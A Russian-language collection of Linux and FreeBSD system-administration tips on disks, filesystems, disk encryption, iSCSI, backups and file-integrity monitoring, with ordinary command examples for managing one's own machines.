done При выполнении: inotifywatch /tmp и последующем завершении выполнения через задание таймаута или нажатия ctrl+c, будет выведена суммарная информация по каждому из классов событий, напрмер: total modify close_write close_nowrite open create delete filename 22 3 4 1 5 4 5 /tmp/ Или inotifywatch -v -e access -e modify -t 60 -r /var/log через 60 секунд выдаст: 14 14 /var/log/ 2 2 /var/log/apache2 4 4 /var/log/postgresql Что касается кроссплатформенного решения, которое работает, не только в Linux, но и во FreeBSD, можно привести пример слежения за изменением файла используя Perl модуль EV (http://search.cpan.org/dist/EV/), использующий универсальную библиотеку-враппер libev: #!/usr/bin/perl use strict; use EV; # Следим за изменениями в директории /tmp/watch # 0 - интервал опроса по умолчанию my $w = EV::stat "/tmp/watch", 0, sub { my ($w, $revents) = @_; warn $w->path, " has changed somehow.".$w->attr."\n"; $w->stop; # На время обработки события, прекращаем прием нотификаций. ..... $w->start; }; EV::loop;

Миграция на файловую систему LVM с поддержкой шифрования в Debian linux (доп. ссылка 1) Автор: Сгибнев Михаил [комментарии]

Администрирование Debian: How To по миграции на файловую систему LVM с поддержкой шифрования Целью данного документа является описание пути перехода на полностью шифрованную файловую систему LVM (корневая файловая система и пользовательские данные, кроме загрузочного раздела). Миграция возможна как с обычной LVM, так и с ext3. Все, что вам понадобится - наличие внешнего хранилища. Отдельно стоит отметить, что данная операция должна проводиться человеком, имеющим некоторый опыт. ЧАСТЬ 1. Установка необходимого ПО и сохранение текущей системы. Есть два способа реализации Full Encrypted LVM (далее - FELVM). a) Debian way (TM), где LVM размещаетя на зашифрованном виртуальном устройстве (cryptsetup). b) Другой путь, когда LVM создается на физическом устройстве, а затем шифруются логические разделы. Конечно, я выбираю debian way, хотя никаких определенных причин для этого нет. В качестве исходных данных у меня имеется /dev/hda1 типа Windows NTFS и несколько других разделов, тип которых не важен, так как их скоро не останется. Перед тем, как мы начнем, рекомендую сделать полную копию ваших данных на внешний носитель с помощью CloneZilla, чтобы потом не иметь бледный вид. Для начала установим 'cryptsetup'. Также ядро должно ключать образ initrd для загрузки. Если это не так, установите пакет initramfs-tools. Затем создайте следующий файл в каталоге /etc/initramfs-tools/conf.d: filename: cryptroot contents: target=lukspace,source=/dev/hda3,key=none,lvm=vg-root Затем выполните команду: # update-initramfs -u Она создаст образ initrd, который будет знать, где находятся шифрованные разделы после создания. Создадим, и это обязательно, tar архив вашей системы на внешний носитель: # tar cSjf /my/external/storage/sysbackup.tar.bz2 /bin/ /boot/ \ /etc/ /home/ /lib/ /opt/ /root/ /sbin/ /selinux/ /srv/ /usr/ /var/ Если вы хотите повысить скорость выполнения данной операции, уберите флаг 'j' и расширение bz2. Это позволит сохранить все права доступа, файлы, владельцев файлов и т.д. Как вы можете заметить, я пропустил каталоги /dev/, /media, /mnt, /proc, /sys, /tmp, так как они будут вновь созданы на новой системе (кроме /media). Я подразумеваю, что никаких действий в системе после сохранения не производится - не открываются консоли и сессии X window, кроме корневой. Настало время получить данные с внешних хранилищ. Будем считать, что оно примонтировано в /media/abyss. Конечно, /media так же содержит cdrom и прочие полезные вещи. # tar cSjf /my/external/storage/databackup.tar.bz2 /media/cdrom /media/whatever /media/... Все ЗА ИСКЛЮЧЕНИЕМ точки монтирования внешнего хранилища! Теперь мы защищены от любых ошибок при конфигурировании. ЧАСТЬ 2. Переформатирование диска и создание структуры FELVM. Помните: если дела приняли дурной оборот - вы всегда можете восстановиться с помощью clonezilla. Я использую clonezilla CD для большинства работ, где мне нужен live CD. Загружаем Clonezilla, настраиваем сеть. Затем в консоли (sudo su) выполняем команды: # aptitude update && aptitude dist-upgrade Возможно перед этим вам понадобится выполнить что-то подобное: # ifconfig eth0 up # dhclient eth0 После того, как live CD обновит ПО нужно установить следущее: # aptitude install cryptsetup joe Joe - мой любимый редактор, поэтому далее мы будем считать, что и ваш тоже. Очищаем диск! # cfdisk /dev/hda и удаляем все разделы за исключением /dev/hda1 (NTFS). Создаем раздел, с которого будет осуществляться загрузка: /dev/hda2 размером 200 MB. Затем создаем другой раздел, занимающий все свободное пространство(/dev/hda3). Его в последствии будет занимать rootfs и данные. Записываем таблицу разделов на диск и выходим. Мы все поломали, но не стоит волноваться, все будет восстановлено с tar архивов. Окончательно удаляем наши данные, заполняя все случайными последовательностями, заодно проверяя наличие badblock: # badblocks -s -w -t random -v /dev/hda2 # badblocks -s -w -t random -v /dev/hda3 На выполнение этих команд требуется время, так что будьте терпеливы. Создаем файловую систему на загрузочном разделе: # mkfs.ext3 /dev/hda2 Используя cryptsetup создадим большой раздел как устройство dm-crypt. Это очень просто: # cryptsetup -y -s 256 -c aes-cbc-essiv:sha256 luksFormat /dev/hda3 Я не буду приводить объяснение всех опций, если хотите - посмотрите сами. Обязательно выберите хорошее ключевое слово, которое вы сможете запомнить. Позже вы сможете сменить его или сделать несколько ключевых слов. Подошло время использовать инициализированное пространство: # cryptsetup luksOpen /dev/hda3 lukspace Эта команда спросит у вас ранее введенное ключевое слово и сделает доступным /dev/mapper/lukspace. Это может быть расценено как устройство, готовое принять любой вид данных. Вы можете форматировать его в ext3 или построить LVM, чем мы сейчас и займемся. Создаем LVM: # pvcreate /dev/mapper/lukspace # vgcreate vg /dev/mapper/lukspace # lvcreate -L10G -nroot vg # lvcreate -l 100%FREE -nmyspace vg Так мы получим логический том LVM /dev/vg/root для корневой файловой системы и /dev/vg/myspace для наших данных. Это было несложно, не так ли? Дальше еще проще: # mkfs.ext3 /dev/vg/root # mkfs.ext3 /dev/vg/myspace ЧАСТЬ 3. Восстановление системных файлов и загрузка новой системы. После того, как вы создадите место для корневой файловой системы, настанет пора разархивировать туда наши данные. Сперва создадим точку монтирования, которую назовем /media/rootfs и затем: # mount /dev/vg/root /media/rootfs а теперь: # cd /media/rootfs # tar xSjf /external_storage/sysbackup.tar.bz2 После чего ждем завершения процесса. Создаем каталоги, которые не были сархивированы: # mkdir proc sys media dev tmp mnt # chmod 1777 tmp Теперь создаем точку монтирования bootfs и монтируем к ней будущий загрузочный раздел: # mkdir bootfs # mount /dev/hda2 bootfs Затем перемещаем загрузочные файлы из rootfs/boot в bootfs. Теперь /dev/hda2 содержит все необходимые для загрузки файлы. И последнее - изменим файл fstab в rootfs/etc таким образом, чтобы указать новое устройство /dev/vg/root. Перезагружаемся. После загрузки grub нажимаем 'e' для редактирования опций ядра и указания правильного root=..., чтобы машина могла загрузиться. Хочется надеяться, что LUKS спросит у вас кодовое слово, и все пойдет хорошо! После того, как вы наиграетесь с вашей зашифрованной системой, отредактируйте /boot/grub/menu.lst для указания корректного устройства root=... и запустите update-grub. Giorgos Pallas

Настройка службы iSCSI на сервере FreeBSD (доп. ссылка 1) Автор: Сгибнев Михаил [комментарии]

Q. Как я могу установить и настроить службу iSCSI на сервере FreeBSD ? A. FreeBSD 7.x полностью поддерживает iSCSI. Старые версии, такие как FreeBSD 6.3 требуют обратного портирования для поддержки iSCSI. Следущие инструкции приведены для настройки iSCSI только под FreeBSD 7.0. FreeBSD iscsi_initiator driver iscsi_initiator в ядре FreeBSD реализует страндарт сетевого протокола Internet SCSI (iSCSI), взаимодействует с пользовательским окружением iscontrol и обеспечивает доступ к удаленным виртуальным SCSI устройствам. Компилирование драйвера обратите внимание на то, что FreeBSD 7.x поставляется с уже скомпилированным драйвером. Вы можете пропустить этот шаг, если драйвер /boot/kernel/iscsi_initiator.ko уже присутствует в вашей системе. Для компиляции ядра с драйвером, выполните следущее: # cd /usr/src/sys/i386/conf # cp GENERIC ISCSIKERNEL # vi ISCSIKERNEL Вставьте строку: device iscsi_initiator Сохраните и закройте файл конфигурации. Соберите ядро: # cd /usr/src # make buildkernel KERNCONF=ISCSIKERNEL Установите ядро: # make installkernel KERNCONF=ISCSIKERNEL Перезагрузите систему: # reboot Установка драйвера iSCSI в FreeBSD Нам необходим драйвер ядра FreeBSD для протокола iSCSI, который называется /boot/kernel/iscsi_initiator.ko. Загрузите его можно с правами пользователя root следующей командой: # kldload -v iscsi_initiator.ko Вывод: Loaded iscsi_initiator.ko, id=6 Для загрузки драйвера во время начальной загрузки, поместите слудующую строку в /boot/loader.conf: # vi /boot/loader.conf # Beginning of the iSCSI block added by Vivek iscsi_initiator_load="YES" # End of the block added by Vivek Сохраните и закройте файл. Команда iscontrol для подключения, предоставления и контроля сессии iSCSI initiator. Теперь нам необходимо использовать команду iscontrol. Сперва просмотрим сессии: # iscontrol -d targetaddress=iSCSI-SERVER-IP-ADDRESS initiatorname=nxl # iscontrol -v -d targetaddress=192.168.1.100 initiatorname=nxl Пожалуйста, запишите список доступных targetnames/targetadresses. Как только будет известно targetname, отредактируйте файл /etc/iscsi.conf: # vi /etc/iscsi.conf Укажите директивы подобным образом: officeiscsi { authmethod = CHAP chapIName = YOUR-ISCSI-USERNAME chapSecret = YOUR-ISCSI-PASSWORD initiatorname = nxl TargetName = iqn.XYZZZZZZZZZZZZZ # whatever "iscontrol -v -d " gives you TargetAddress = 192.168.1.100:3260,1 # your iscsi server IP } Сохраните и закройте файл. Где: officeiscsi { : Начало конфигурации iSCSI. authmethod : Установить в качестве метода аутентификации chap chapIName : Имя chapSecret : Пароль initiatorname : Если не указано другое, то iqn.2005-01.il.ac.huji.cs:<hostname> TargetName : Имя, под которым будет изветен target. Не путайте его с target address, который назначается администратором или через поиск устройств. TargetAddress : Имеет вид domainname[:port][,portal-group-tag] согласно RFC: domainname может быть определен как имя DNS, адрес IPv4 в десятичном представлении или IPv6 адрес, как указано в [RFC2732]. } : Конец конфигурации Старт сессии iSCSI Следущие команды читают опции из /etc/iscsi.conf, используя targetaddress в блоке, называемом officeiscsi, и запускают сессию iscsi. # iscontrol -c /etc/iscsi.conf -n officeiscsi Как только вы выполните команду iscontrol, должно создаться новое устройство в каталоге /dev. Для проверки выполним команду dmesg: # dmesg Форматируем диск iSCSI Запустим sysinstall для форматирования обнаруженного устройства iSCSI: # sysinstall Выбираем Custom > 3 Partition > Выбираем устройство iSCSI по имени da1. После форматирования вводим: # mkdir /iscsi # mount /dev/da1s1 /iscsi Возможно вам понадобится обновить файл /etc/fstab: /dev/ad1s1 /iscsi ufs rw 3 3

Составление списка мертвых символических ссылок (доп. ссылка 1) Автор: pavlinux [комментарии]

Находим файлы символических ссылок, которые никуда не указывают. find / -noleaf -type l -print | perl -nle '-e || print' Эта команда выведет все мертвые ссылки на стандартные вывод. Можно перевести вывод в файл, для изучения и исправления. Или просто удалить, добавив конвейер: "| xargs rm", то есть так: find / -noleaf -type l -print |perl -nle '-e || print' | xargs rm PS. В BSD системах нужно отбросить опцию -noleaf, которая реализована только в GNU find.

Как минимизировать влияние бэкап-скрипта на интенсивность ввода/вывода в Linux (доп. ссылка 1) [комментарии]

Задача сделать так, чтобы выполнение скрипта для бэкапа не сказывалось на производительности приложений с интенсивными дисковыми операциями. Решение - понижение приоритета скрипта в планировщике ввода/вывода CFQ, который включен в Linux ядро, начиная с версии 2.6.13, и используется по умолчанию начиная с 2.6.18. Проверяем, что активный планировщик у нас CFQ: for d in /sys/block/sd[a-z]/queue/scheduler; do echo "$d => $(cat $d)" ; done Видим: /sys/block/sda/queue/scheduler => noop anticipatory deadline [cfq] Запускаем скрипт бэкапа с пониженным приоритетом: nice -n 19 ionice -c2 -n7 backup.sh утилитой nice с самым низким приоритетом вызываем утилиту ionice cо 2 классом планировки ( 1 - real time, 2 - нормальный режим, 3 - работа только в моменты простоя (idle)) и самым низким уровнем приоритета (7). Если процесс все равно мешает, можем на лету перевести его в idle режим: ionice -c3 -p 1004 или изменить приоритет планировщика: renice 19 -p 1004 Где 1004 - PID процесса.

Отключение HPA или решение проблемы определения 1Тб диска Автор: Kroz [комментарии]

Исходные данные: Motherboard: GA-965P-DS3 rev. 1.0 Motherboard BIOS: BIOS F1 HDD: Samsung HD103UJ (1 Терабайт) HDD: Western Digital WD10EACS (1 Терабайт) OS: Gentoo Linux hdparm v8.6 Проблема: Недавно я приобрёл два SATA HDD размером в 1000Мб (1Тб): Samsung HD103UJ и Western Digital WD10EACS. Я подключил их оба к материнке и к моему удивлению в BIOS один из них (Samsung) определился как 32Мб. Манипуляции со шлейфами (портами SATA) биосом, операционкой и другие танцы с бубном не помогали. Samsung был реанимирован с помощью HDD Capacity Restore под Windows у товарища. Дома диск определился правильно. Предполагая, что проблема была с Samsung'ом я продолжил манипуляции с дисками дома. К моему удивлению я через некоторое время обнаружил, что Western Digital тоже стал определяться как 32Мб. Причина: Причина в том, что материнская плата (BIOS) резервировала некоторое место под свои нужды. Это зовется HPA (Host Protected Area). После данной манипуляции по каким-то причинам диск начинал определяться неправильно. Насколько мне известно, такое происходит только с терабайтными жесткими дисками, если объем меньше, то активизация HPA не повлияет на определение размера BIOS'ом. Активизация данной функции (области) происходила при подключении к определённому SATA порту. На моей материнке есть два типа SATA портов: т. н. SATA-II 0/1/2/3 (желтые, от контроллера Intel ICH8) и т. н. GSATA-II 0/1 (красные, от контроллера J-Micron). Данный эффект происходил на порту SATA-II 0 (возможно и на других портах SATA-II; по крайней мере HDD на GSATA-II 0/1 не затрагивались). Соответственно в первом случае я подключал Samsung к SATA-II, а WD к GSATA-II, во втором случае, я их поменял (естественно, я не придавал этому значения). Решение: Под Windows данная проблема решается программой HDD Capacity Restore http://www.bestvistadownloads.com/download/t-free-hdd-capacity-restore-download-aqauycgh.html Во FreeBSD 8 это делается путём установки : hw.ata.setmax="1" в loader.conf Под Linux это решается стандартными средствами - командой hdparm. Вот пример: Диск без HPA: $ hdparm -N /dev/sdd /dev/sdd: max sectors = 1953525168/1953525168, HPA is disabled Диск с HPA: $ hdparm -N /dev/sdc /dev/sdc: max sectors = 586070255/586072368, HPA is enabled Для отключения HPA для второго случая используем комманду $ hdparm -N p586072368 /dev/sdc То есть мы приравниваем количество секторов, доступных пользователю, к максимальном количеству секторов на диске. Буква 'p' необходима для того, чтобы настройки сохранились в flash жесткого диска (то есть чтобы после выключения питания они сохранились). Менять параметр с ключем 'p' можно только один раз за сессию жесткого диска (сессия - промежуток времени между включениям и выключением). После изменения параметра необходимо выключить и включить винчестер (по факту - компьютер). Что касается решения корня проблемы - есть мнение, что прошивка F7 материнской платы ее устраняет, но я не пробовал. Дополнительная информация: http://en.wikipedia.org/wiki/Host_Protected_Area http://www.linux.gr/cgi-bin/man/man2html?hdparm+8 http://www.gigabyte.ru/forum/viewtopic.php?f=23&t=25076&p=142923 http://www.gigabyte.com.tw/Products/Motherboard/Products_Spec.aspx?ProductID=2361

Как в Fedora Linux создать загрузочный USB Flash на базе ISO образа (доп. ссылка 1) [комментарии]

Создание загрузочного USB Flash на базе ISO образа, без форматирования и потери сохраненных на Flash данных (ставится прямо в VFAT, используя свободное место) Устанавливаем пакет livecd-tools yum install livecd-tools Создаем загрузочный USB Flash (устройство /dev/sdb1) livecd-iso-to-disk livecd.iso /dev/sdb1 Возможные проблемы и их решения: Если программа выдала сообщение "Partition isn't marked bootable!", запускаем: parted /dev/sdb Выполняем команду print и смотрим номер раздела (если раздел один, то будет 1) Выполняем команду: toggle 1 boot Выходим из parted: quit Или в fdisk используем команду "a". Если программа выдала сообщение "Need to have a filesystem label or UUID for your USB device": dosfslabel /dev/sdb1 usbdisk вместо usbdisk можно указать любое имя, на ваше усмотрение. Если программа выдала сообщение "MBR appears to be blank", копируем образ MBR: cat /usr/lib/syslinux/mbr.bin > /dev/sdb Если fdisk -l /dev/sdb выдает "Partition has different physical/logical endings!" - нужно переформатировать Flash: Создаем в fdisk один primary раздел типа 6 (FAT) Форматируем: mkdosfs -n usbdisk /dev/sdb1 Тестируем подготовленный загрузочный Flash: qemu -hda /dev/sdb1 -m 256 -std-vga Если при загрузке пишет: "SYSLINUX 3.xx ... EBIOS Load error - Boot error", нужно обновить пакет syslinux до версии 3.50 или выше.

Как обновить данные в Linux ядре, после изменения таблицы разделов (доп. ссылка 1) [комментарии]

После изменения таблицы разделов стандартный fdisk предлагает перезагрузиться, чтобы ядро восприняло изменения. Для того, чтобы обойтись без перезагрузки можно использовать утилиту partprobe (просто запустить без параметров). partprobe входит в состав пакета parted. Вариант без использования partprobe (подсказал Andrey Mitrofanov): blockdev --rereadpt

Увеличение скорости работы ext2/ext3 с директориями c большим числом файлов внутри (доп. ссылка 1) Автор: Роман Лагунов [комментарии]

Для ускорения работы ext2/ext3 в пакете e2fsprogs начиная с версии 1.39 появилась возможность использования технологии "directory indexing", или "HTree". Чтобы включить dir_index в /dev/hdb1, для отмонтированного раздела нужно выполнить команду: tune2fs -O +dir_index /dev/hdb1 Далее нужно перестроить индекс директорий: e2fsck -Df /dev/hdb1

Шифрованный виртуальный диск под FreeBSD 5 (доп. ссылка 1) Автор: levsha [комментарии]

Предполагается что в полном распоряжении есть FreeBSD 5.X Разборки "что ставить на сервер: 4.X или 5.X" не обсуждаются. В случае использования FreeBSD 4.X необходимо вместо mdconfig использовать vnconfig и вместо gbde использовать vncrypt. Компилируем ядро с options GEOM_BDE # поддержка шифрованых дисков device md # Memory "disks" Создаем директорию, где все будет валяться mkdir /usr/cert/ Создаем файл, где будет файловая система (размером 100 мегабайт) dd if=/dev/zero of=fimage bs=1m count=100 создаем девайс на основании этого файла и создем там таблицу разделов на весь диск mdconfig -a -t vnode -f /usr/cert/fimage -u 0 disklabel -r -w md0 auto Инициируем gbde патишен gbde init /dev/md0c -i -L /usr/cert/fimage.lock В текстовом редакторе откроется конфиг файл для этого шифрованого раздела. Если используется UFS 1 или2 то рекомендуется изменить параметр sector_size с 512 на 2048. Сохраняемся, вводим два раза пароль, который будет использоваться для доступа к этому шифрованому разделу. Подключаем шифрованый раздел (будет запрошен пароль для подключения). gbde attach /dev/md0c -l /usr/cert/fimage.lock Создаем на полученном разделе файловую систему. newfs -U /dev/md0c.bde Создаем директорию, куда будем маунтить: mkdir /usr/cert/sslcert Монтируем mount /dev/md0c.bde /usr/cert/sslcert Типа все работает. Теперь создадим скрит для удобства монтирования/размонтирования с таким содержанием: #!/bin/sh case "$1" in start) /sbin/mdconfig -a -t vnode -f /usr/cert/fimage -u 0 /sbin/gbde attach /dev/md0c -l /usr/cert/fimage.lock /sbin/mount /dev/md0c.bde /usr/cert/sslcert ;; stop) /sbin/umount /usr/cert/sslcert /sbin/gbde detach /dev/md0c /sbin/mdconfig -d -u 0 ;; *) echo "" echo "Usage: `basename $0` { start | stop }" echo "" exit 64 ;; esac Все, пользуемся в свое удовольствие. При подготовке использованы источники: FreeBSD Handbook , mdconfig(8), gbde(8)

Шифрованный swap в FreeBSD 6.0 Автор: neozoid [комментарии]

Добавить в /boot/loader.conf: geom_eli_load="YES" или в конфиг ядра: device crypto options GEOM_ELI в fstab к разделу swap к "Device" дописать ".eli" например: # Device Mountpoint FStype Options Dump Pass# #/dev/ad0s3b none swap sw 0 0 /dev/ad0s3b.eli none swap sw 0 0 при загрузке имеем: GEOM_ELI: Device ad0s3b.eli created. GEOM_ELI: Cipher: AES GEOM_ELI: Key length: 256 GEOM_ELI: Crypto: software и в моем случае: %pstat -s Device 1K-blocks Used Avail Capacity /dev/ad0s3b.eli 1048576 0 1048576 0%

Причины ошибок при попытке создать раздел в FreeBSD 5 (доп. ссылка 1) Автор: lavr [комментарии]

В 5'ке из-за GEOM'а есть защита от изменений в таблице партиций на уже установленной системе. Например, ругается: ERROR: Unable to write data to disk amrd3 Вот из-за этого и нельзя записать информацию в таблицу партиций. Решение: вариант 1: - смотрим переменную ядра: sysctl kern.geom.debugflags - устанавливаем в следующее значение для разрешения записи в таблицу партиций: sysctl kern.geom.debugflags=16 - теперь можем вручную конфигурить диски, массив и писать в таблицу партиций тонкость: не используй sysinstall - даже при установленной переменной kern.geom.debugflags=16 эта утилита не позволит записать в таблицу. вариант 2: - если хочешь использовать именно sysinstall - грузись с CD и используй sysinstall

Изменение порядка нумерации дисковых разделов в Linux Автор: sleepycat [обсудить]

Если вы создавали разделы начиная с конца диска к началу, в выводе команды # fdisk -l /dev/hda (здесь и далее, hda - заменить на ваше устройство) скорее всего, будет присутствовать следующая фраза: Partition table entries are not in disk order по причине того, что разделы пронумерованы не в порядке следования, а в порядке создания. Исправить нумерацию разделов на диске можно следующим образом: Загружаемся с live-cd либо (если этот диск не не содержит необходимых для функциоирования системы разделов) отмонтируем все его разделы. Далее: # fdisk /dev/hda после приглашения ввода команды жмем клавишу 'x' для перехода в режим раширенной функциональности, после чего клавишу 'f' для исправления таблицы разделов, и клавишу 'w' для записи изменений. После чего, можно завершать работу с fdisk, проверять расположение разделов на диске и, при необходимости, не забыть исправить записи в fstab. Наименования используемых пунктов fdisk (можно напомнить себе прочитав help после нажатия клавиши 'm'): x extra functionality (experts only) f fix partition order w write table to disk and exit q quit without saving changes

Контроль целостности системы штатными средствами Автор: Avatar [комментарии]

Что делать если под рукой нет tripwire или osec, а кривой aide вы пользоваться не хотите. Часть функций , таких как проверка прав доступа и изменение файлов, можно реализовать штатными стедствами. Вот маленький скрипт который помещается в crontab и позволяет это реализовать. При желании его функции можно легко расширить. #!/bin/bash ulimit -t 20 checkdir="/bin /sbin" filedb="/var/tmp/permsecdb" email="test@test.ru" out=$( exec 2>&1 umask 266 find $checkdir -type f -printf "%m\t" -exec md5sum {} \; >$filedb.tmp diff $filedb $filedb.tmp mv -f $filedb.tmp $filedb ) if [ "$out" ];then (date; echo; echo "$out") |mail -s "Change permsec `hostname`" $email fi - ulimit лучше выставить не случай не предвиденных ситуаций. - checkdir соответственно проверяемые директории - filedb текстовой файл базы - email куда посылать мыло Если изменений в системе не было, то сообщения посылаться не будут. Сообщение бывает 4 видов 1 - ошибки 2 - добавлен файл "> 644 d41d8cd98f00b204e9800998ecf8427e /bin/12" 3 - удален файл "< 755 c1a0ff878c603dd91f603059e9c1a0a1 /bin/12" 4 - изменен файл " < 755 ce367ef1e2cca19e6216874cb8c09d96 /bin/12 --- > 755 c1a0ff878c603dd91f603059e9c1a0a1 /bin/12" Успешного контроля.

Как получить информацию о разделах диска для бэкапа [комментарии]

Linux: fdisk -l /dev/hda > partitions.txt cat /proc/partitions BSD: disklabel da0s1 > partitions.txt Для восстановления или клонирования: fdisk -BI -v -b /boot/mbr da1 # Слайс на весь диск. disklabel -R -B -r da1s1 partitions.txt Параметры FS, без ее реального создания можно посмотреть через: newfs -N /dev/da0s1e Для визуального создания или редактирования разделов удобно использовать /stand/sysinstall (Configure/Fdisk иди Label), в качестве точки монтирования не забыть добавить перед именем "/mnt" и создать директорию для монтирования.

Как уменьшить размер зарезервированного для root места на диске [комментарии]

Linux: tune2fs -l /dev/hda6 # Смотрим установки tune2fs -m 2 /dev/hda2 # Меняем на 2 процента FreeBSD: tunefs -p /dev/da1s1 # Смотрим установки tunefs -m 2 /dev/da1s1 # Меняем на 2 процента

Как переименовать имена файлов из одной кодировки в другую (доп. ссылка 1) [комментарии]

Если не переименовывать каталоги: Вариант 1: find | sort -r | while read f; do fn=$(basename "$f"|iconv -f koi8-r -t windows-1251); [ "$fn" = "$(basename "$f")" ] || mv "$f" "$(dirname "$f")/$fn"; done Вариант 2: #!/bin/sh # аргумент 1 - путь # аргумент 2 - из какой кодировки # аргумент 3 - в какую кодировку find $1 -regex "$1/.*" | sort -r | while read f; do fb=$(basename "$f"); fd=$(dirname "$f"); nfb=$(echo "$fb"|iconv -f $2 -t $3); [ "$fb" = "$nfb" ] || (mv "$fd/$fb" "$fd/$nfb"; echo "$fd $fb -> $nfb";) done Вариант 3: Использовать готовую программу для переименования с изменением кодировки http://j3e.de/linux/convmv/

Шифрование файлов используя loopback устройство под Debian Linux (доп. ссылка 1) [комментарии]

Установка пакетов: apt-get install loop-aes-utils apt-get install cryptsetup Подгрузка модулей: modprobe loop modprobe aes Создаем образ будущего шифрованного раздела: dd if=/dev/zero of=/home/marco/crloop bs=1M count=640 Способ 1 (устарел, лучше использовать dm-crypt): modprobe cryptoloop losetup -e aes /dev/loop0 /home/marco/crloop mkfs -t ext2 /dev/loop0 mount /dev/loop0 /media/cryptovolume ..... umount /media/cryptovolume losetup -d /dev/loop0 Способ 2 (рекомендуется для новых ядер): modprobe dm-crypt losetup /dev/loop0 /home/marco/crloop cryptsetup -c aes -y create crloop /dev/loop0 mkfs.ext3 /dev/mapper/crloop mount /dev/mapper/crloop /media/cryptovolume ..... umount /media/cryptovolume cryptsetup remove crloop losetup -d /dev/loop0.

Изменение атрибутов ext2fs и ext3fs используя chattr (доп. ссылка 1) [обсудить]

Команда chattr позволяет изменять параметры ФС для отдельного файла или директории: chattr +a - только добавление данных (append-only), удаление и переименование запрещено; chattr +i - запрещено удаление, изменение или переименование (immutable); chattr +A - запретить сохранение данных о каждом обращении к файлу (no atime) chattr +S - синхронное изменение всех данных на диск, без кэширования; chattr +c - файл будет хранится на диске в сжатом виде (нужен отдельный патч для ядра); chattr +s - после удаления файла, место на диске забивается нулями (внешний патч); chattr +u - резервирование данных файла после удаления (внешний патч); Пример: chattr -R +i /bin /sbin /usr/bin /usr/sbin - запрещаем изменение бинарников chattr +a /var/log/secure - предотвращаем модификацию лога злоумышленником Для просмотра расширенных атрибутов используется утилита lsattr. Для FreeBSD см. man chflags и man security

Полный бэкап на дополнительный диск при помощи rsync (доп. ссылка 1) [комментарии]

Резервный диск монтируем как /backup в read-only режиме. По крону еженощно запускаем скрипт следующего содержания: /sbin/mount -u -w /backup # пепреводим раздел в rw режим, mount "-o remount,rw /backup" для Linux /usr/bin/rsync -a --delete --delete-excluded --max-delete=200 \ --exclude-from=/etc/ex_files_list.txt / /backup RETCODE=$? if [ $RETCODE -ne 0 ]; then echo "Err code=$RETCODE"| mail -s "RSYNC BACKUP ERROR" alert@test.ru fi /sbin/mount -u -r /backup # раздел обратно в ro, mount "-o remount,ro /backup" для Linux Если backup-диск большой, лучше вести две полные копии, на случай краха во время бэкапа (или см. опцию --backup); При бэкапе на другой сервер: rsync [...опции как выше] --compress --bwlimit=100 --timeout=120 \ -e ssh source/ login@backuphost:/backup/node1 Список файлов для исключения из бэкапа (ex_files_list.txt): /backup /mnt /proc /tmp /var/log /usr/obj /usr/src /usr/tmp /usr/ports /usr/local/apache/logs

Почему на нагруженных серверах лучше использовать SCSI диски, а не IDE. [комментарии]

1. Качество исполнения, запас прочности и надежность накопителей со SCSI интерфейсом как правило выше, чем у IDE. 2. Два подключенных к одному каналу контроллера IDE накопителя, не могут одновременно передавать данные по шине. 3. SCSI показывают значительно лучшую производительность в загруженной многозадачной среде, при обилии разрозненных параллельных запросов за счет более оптимального использования шины передачи данных. (конек IDE - линейное чтение, сильная сторона SCSI - случайный доступ). Поясняю: Специфика IDE такова, что запросы могут передаваться по одной шине последовательно (одна труба передачи данных, однопоточный режим). Допустим, если 100 процессов обращаются к данным на диске, запросы в рамках одного канала контроллера будут обрабатываться один за другим, каждый следующий после полного выполнения предыдущего (связка: выдача команды - получение данных). При использовании SCSI, допускается перекрытие запросов (организуется очередь команд), ответы при этом будут получены распараллеленно (асинхронная передача), при этом устройство заведомо зная подробности по командам находящимся в очереди, производит оптимизацию самостоятельно - минимизируя движение головок.

Как создать файл устройства для монтирования раздела диска. [обсудить]

Linux IDE # Linux SCSI # FreeBSD 4 mknod /dev/hda b 3 0 # /dev/sda b 8 0 # /dev/ad0 b 116 0x00010002 mknod /dev/hda1 b 3 1 # /dev/sda1 b 8 1 # /dev/ad0s1 b 116 0x00020002 mknod /dev/hda2 b 3 2 # /dev/sda2 b 8 2 # /dev/ad0s1a b 116 0x00020000 mknod /dev/hdb b 3 64 # /dev/sdb b 8 16 # /dev/ad0s1b b 116 0x00020001 mknod /dev/hdb1 b 3 65 # /dev/sdb1 b 8 17 # /dev/ad0s1c b 116 0x00020002 mknod /dev/hdc b 22 0 # /dev/sdc b 8 32 # /dev/ad1s1a b 116 0x00020008 mknod /dev/hdd b 22 64 # /dev/sdd b 8 48 # /dev/da1s1a b 13 0x00020000

Как в FreeBSD разрешить пользователю только добавлять данные в файл. [обсудить]

man chflags; man 2 chflags Флаги (chflags флаг файл): sappnd - все, кроме root или владельца (uppnd), могут лишь добавлять информацию в конец файла; schg - только root или владелец файла (uchg) может изменить, перенести или удалить файл; sunlnk - только root или владелец файла (uunlink) может удалить или переименовать файл; Чтобы убрать установленный флаг, нужно использовать префикс "no", т.е. nouchg, nuschg и т.д.

Как автоматически удалять все файлы в каталоге, созданные позднее N дней [комментарии]

удаляем старше 1 часа: find /var/tmp_log/ -type f -mmin +60 -exec rm -f {} \; удаляем старше 10 дней: find /var/tmp_log/ -type f -mtime +10 -exec rm -f {} \;

Как отформатировать флоппи-диск с FAT. [комментарии]

Linux: mkdosfs -c -f 16 -n "метка тома" /dev/fd0h1440 или mkfs -t fat16 /dev/fd0h1440 FreeBSD: fdformat -f 1440 /dev/fd0 или newfs_msdos -f 1440 -L "label" fd0

Оптимизация дисковой подсистемы в Linux [обсудить]

man hdparm (например: /sbin/hdparm -c3 -d1 -X34 /dev/hda) man elvtune man tune2fs echo 128000 > /proc/sys/fs/inode-max # def 16384 echo 64000 > /proc/sys/fs/file-max # def 4096 Число одновременно открытых файлов. cd /proc/sys/fs/ (в 2.4.x работает автотюнинг) /usr/src/linux/Documentation/sysctl/fs.txt /usr/src/linux/Documentation/filesystems/proc.txt

Как правильно прописать сменные накопители в /etc/fstab [обсудить]

Для решения проблем с русскими именами файлов в Linux для CDROM, дискеты и Windows раздела следует прописать в /etc/fstab: /dev/cdrom /mnt/cdrom iso9660 ro,nosuid,noauto,exec,user,nodev 0 0 /dev/fd0 /mnt/floppy vfat iocharset=koi8-r,sync,nosuid,codepage=866,user,--,noauto,nodev,unhide 0 0 /dev/hda1 /mnt/windows vfat user,exec,umask=0,codepage=866,iocharset=koi8-r 0 0

Как увеличить производительность дисковой подсистемы FreeBSD. [комментарии]

